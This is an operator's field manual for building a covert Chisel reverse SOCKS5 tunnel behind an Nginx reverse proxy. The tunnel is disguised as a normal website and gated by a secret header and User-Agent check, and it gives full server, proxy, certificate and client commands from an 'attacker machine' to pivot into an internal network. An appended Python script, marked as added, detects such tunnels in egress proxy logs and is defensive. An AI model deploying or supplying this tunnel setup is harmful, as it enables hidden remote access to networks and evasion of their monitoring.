Field Manual: Deploying a Secure Chisel Tunnel Behind Nginx

 


Prerequisite: you need a registered domain name before proceeding.

📌 Overview

This guide details how to set up a secure and stealthy Chisel tunnel behind an Nginx reverse proxy with TLS encryption. The infrastructure allows for covert access to an internal network through a public domain while masquerading as a legitimate website.

🛠️ Infrastructure Components

1️⃣ Chisel Server (Cloud VPS)

  • Hosts the SOCKS5 proxy and allows reverse tunneling.

  • Restricted access using authentication and custom headers.

2️⃣ Nginx Reverse Proxy (Cloud VPS)

  • Hides Chisel behind HTTPS (/tunnel).

  • Serves a normal website for cover.

3️⃣ TLS Certificates (Let's Encrypt or Self-Signed)

  • Encrypts Chisel traffic for security and stealth.

4️⃣ Chisel Client (Attacker Machine)

  • Establishes a reverse tunnel connection.

  • Provides a SOCKS5 proxy to access the internal network.


🚀 Deployment Steps

1️⃣ Install & Configure Chisel Server

📌 Step 1: Install Chisel on Cloud VPS

sudo apt update && sudo apt install -y git curl
cd /opt
sudo git clone https://github.com/jpillora/chisel.git && cd chisel
# Building from source requires a Go toolchain to be installed already
sudo go build -o chisel
sudo mv chisel /usr/local/bin/

📌 Step 2: Create Authentication File

sudo mkdir -p /etc/chisel
sudo nano /etc/chisel/chisel-users

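Add the following JSON structure. Chisel's users file maps each "user:pass" string to a list of regular expressions for the remote addresses that user may open; ".*" allows any remote:

{
  "testUser:TestPass#123": [".*"]
}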

Save and exit (Ctrl + X, then Y)

📌 Step 3: Start Chisel Server

sudo chisel server --socks5 --reverse --port 8000 --authfile /etc/chisel/chisel-users

✅ Chisel is now running on port 8000 but is not yet secured.


2️⃣ Set Up Nginx Reverse Proxy

📌 Step 1: Install Nginx

sudo apt install nginx -y

📌 Step 2: Configure Nginx for Chisel

sudo nano /etc/nginx/sites-available/chisel

Paste the following configuration:

server {
    listen 443 ssl;
    server_name "domain name without http https";

    ssl_certificate /etc/letsencrypt/live/folder/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/folder/privkey.pem;
    ssl_protocols TLSv1.2 TLSv1.3;
    ssl_prefer_server_ciphers on;

    location / {
        root /var/www/html;
        index index.html index.htm;
    }
    
    location /tunnel {
        # Requests without the expected header or User-Agent are redirected to the site root
        if ($http_x_special_header != "our_secret_value") {
            return 301 https://"domain name";
        }
        if ($http_user_agent != "Go-http-client/1.1") {
            return 301 https://"domain name";
        }
        proxy_pass http://localhost:8000;
        proxy_http_version 1.1;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection "upgrade";
        proxy_set_header Host $host;
    }
}

📌 Step 3: Enable the Nginx Configuration

sudo ln -s /etc/nginx/sites-available/chisel /etc/nginx/sites-enabled/
sudo nginx -t && sudo systemctl restart nginx

✅ Now, Chisel is only accessible through https://"domain name" with the correct secret header.


3️⃣ Secure with SSL/TLS Certificates

📌 Option 1: Free TLS via Let's Encrypt (Recommended)

sudo apt install certbot python3-certbot-nginx -y
sudo certbot certonly --nginx -d "domain name without http https"

✅ Certificates will be stored in:

/etc/letsencrypt/live/folder/fullchain.pem
/etc/letsencrypt/live/folder/privkey.pem

📌 Option 2: Self-Signed TLS for Testing

sudo mkdir -p /etc/chisel/pemFormat/chisel_domain_certs
cd /etc/chisel/pemFormat/chisel_domain_certs
sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout privkey.pem -out fullchain.pem

✅ Store in:

/etc/chisel/pemFormat/chisel_domain_certs/fullchain.pem
/etc/chisel/pemFormat/chisel_domain_certs/privkey.pem

Restart Nginx:

sudo systemctl restart nginx

4️⃣ Start the Chisel Client

sudo chisel client -v --header "X-Special-Header: our_secret_value" --auth "testUser:TestPass#123" https://"domain name"/tunnel R:1080:socks
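
From the monitoring side, the client command above shows up as a long-lived WebSocket upgrade carrying Go's default User-Agent, the same value the Nginx rule matches on. This added example (not part of the original manual) flags that combination in egress proxy logs. It assumes a TLS-inspecting proxy that records request headers; the JSON log schema, the one-hour threshold and the sample records are constructed.

```python
import json

# Constructed sample records from a TLS-inspecting egress proxy, one JSON object
# per line. Field names are assumptions, not a real product's schema.
SAMPLE_LOG = """\
{"src":"10.0.4.17","host":"shop.example.net","path":"/tunnel","ua":"Go-http-client/1.1","upgrade":"websocket","status":101,"duration_s":14400}
{"src":"10.0.4.22","host":"chat.example.org","path":"/ws","ua":"Mozilla/5.0 (X11; Linux x86_64)","upgrade":"websocket","status":101,"duration_s":620}
{"src":"10.0.4.17","host":"modules.example.com","path":"/pkg/list","ua":"Go-http-client/1.1","upgrade":"","status":200,"duration_s":1}
{"src":"10.0.4.30","host":"shop.example.net","path":"/","ua":"Mozilla/5.0 (Windows NT 10.0)","upgrade":"","status":200,"duration_s":1}
truncated line that is not JSON
"""

GO_DEFAULT_UA = "Go-http-client/1.1"  # the User-Agent the Nginx rule on this page matches
LONG_SESSION_S = 3600                 # assumed threshold for a long-lived session


def score(rec):
    """Return the tunnel indicators present in one proxy record."""
    hits = []
    is_ws = (rec.get("upgrade") or "").lower() == "websocket" and rec.get("status") == 101
    if is_ws:
        hits.append("websocket-upgrade")
    if rec.get("ua") == GO_DEFAULT_UA:
        hits.append("go-default-ua")
    if is_ws and (rec.get("duration_s") or 0) >= LONG_SESSION_S:
        hits.append("long-lived")
    return hits


def find_tunnel_candidates(log_text, min_hits=2):
    """Parse JSON lines, skip malformed ones, return sessions worth triage."""
    findings = []
    for line in log_text.splitlines():
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue
        if not isinstance(rec, dict):
            continue
        hits = score(rec)
        # A Go User-Agent alone (build tooling) or a browser WebSocket alone is
        # routine, so require the upgrade plus at least one more indicator.
        if "websocket-upgrade" in hits and len(hits) >= min_hits:
            findings.append((rec.get("src"), rec.get("host"), rec.get("path"), hits))
    return findings


if __name__ == "__main__":
    for finding in find_tunnel_candidates(SAMPLE_LOG):
        print(finding)
```
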

Troubleshooting Guide

Issue 1: Chisel Client Not Connecting

Fix:

  • Ensure Nginx is correctly forwarding requests to Chisel (sudo systemctl restart nginx).

  • Verify Chisel is running on port 8000 (netstat -tulnp | grep 8000).

  • Check authentication details (cat /etc/chisel/chisel-users).

Issue 2: TLS Certificate Errors

Fix:

  • If using Let's Encrypt, renew certificates (sudo certbot renew).

  • If using self-signed certs, ensure the correct paths are set in Nginx.

Issue 3: SOCKS5 Proxy Not Working

Fix:

  • Ensure the Chisel client is running with R:1080:socks.

  • Verify ProxyChains is correctly configured (cat /etc/proxychains4.conf).

  • Test proxy manually: curl --proxy socks5h://127.0.0.1:1080 http://example.com.

🚀 Now you have a fully functional, stealthy Chisel tunnel behind Nginx!
